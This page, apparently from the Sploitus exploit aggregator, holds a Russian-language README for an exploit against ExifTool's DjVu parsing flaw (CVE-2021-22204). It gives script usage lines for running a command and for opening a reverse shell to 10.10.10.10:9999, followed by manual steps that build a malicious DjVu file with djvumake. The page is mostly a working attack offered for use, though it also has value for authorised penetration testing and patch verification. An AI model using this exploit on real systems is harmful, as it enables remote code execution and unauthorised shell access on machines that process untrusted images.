Sploitus

Exploit for CVE-2021-22204 CVE-2021-2204 CVE-2021-22204

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN48 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ASSASSINUKG-CVE-2021-22204
# CVE-2021-22204

## ОписаниС

ΠΠ΅ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½Π°Ρ нСйтрализация ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠΈΡ… Π΄Π°Π½Π½Ρ‹Ρ… Π² Ρ„ΠΎΡ€ΠΌΠ°Ρ‚Π΅ Ρ„Π°ΠΉΠ»ΠΎΠ² DjVu Π² ExifTool вСрсий 7.44 ΠΈ Π²Ρ‹ΡˆΠ΅ позволяСт Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡ‚ΡŒ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹ΠΉ ΠΊΠΎΠ΄ ΠΏΡ€ΠΈ Ρ€Π°Π·Π±ΠΎΡ€Π΅ врСдоносного изобраТСния.

## Π‘ΠΊΡ€ΠΈΠΏΡ‚

Бсылка Π½Π° скрипт

![ΠΈΠ·ΠΎΠ±Ρ€Π°ΠΆΠ΅Π½ΠΈΠ΅](https://assets.kitploit.com/production/public/readmes/15399/859e8263ee67a33096ec86430cf95e44b0ea1420dd39564c3fb6731d863a6a88.png)

### ИспользованиС скрипта:

БистСмная ΠΊΠΎΠΌΠ°Π½Π΄Π°:

root@kitploit:~
    
    
    bash CVE-2021-2204.sh "system('id')" happy.jpg 
    

ΠžΠ±Ρ€Π°Ρ‚Π½Π°Ρ ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠ°

root@kitploit:~
    
    
    bash CVE-2021-2204.sh "reverseme 10.10.10.10 9999" happy.jpg
    

*Π’Π°Ρˆ IP ΠΈ PORT

## Ручная эксплуатация

root@kitploit:~
    
    
    $ sudo apt install djvulibre-bin
    # УстанавливаСт Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΡ‹Π΅ инструмСнты
     
    $ bzz payload payload.bzz
    # Π‘ΠΆΠΈΠΌΠ°Π΅Ρ‚ наш Ρ„Π°ΠΉΠ» ΠΏΠΎΠ»Π΅Π·Π½ΠΎΠΉ Π½Π°Π³Ρ€ΡƒΠ·ΠΊΠΈ, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΎΠ½ Π½Π΅ Π±Ρ‹Π» Ρ‡ΠΈΡ‚Π°Π΅ΠΌΡ‹ΠΌ Ρ‡Π΅Π»ΠΎΠ²Π΅ΠΊΠΎΠΌ
     
    $ djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
    # INFO = Π›ΡŽΠ±ΠΎΠ΅ Π·Π½Π°Ρ‡Π΅Π½ΠΈΠ΅ Π² Ρ„ΠΎΡ€ΠΌΠ°Ρ‚Π΅ 'N,N', Π³Π΄Π΅ N β€” число
    # BGjp = ΠžΠΆΠΈΠ΄Π°Π΅Ρ‚ JPEG-ΠΈΠ·ΠΎΠ±Ρ€Π°ΠΆΠ΅Π½ΠΈΠ΅, Π½ΠΎ ΠΌΡ‹ ΠΌΠΎΠΆΠ΅ΠΌ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ /dev/null ΠΊΠ°ΠΊ пустой Ρ„ΠΎΠ½
    # ANTz = ЗаписываСт сТатый Π°Π½Π½ΠΎΡ‚Π°Ρ†ΠΈΠΎΠ½Π½Ρ‹ΠΉ Π±Π»ΠΎΠΊ ΠΈΠ· Π²Ρ…ΠΎΠ΄Π½ΠΎΠ³ΠΎ Ρ„Π°ΠΉΠ»Π°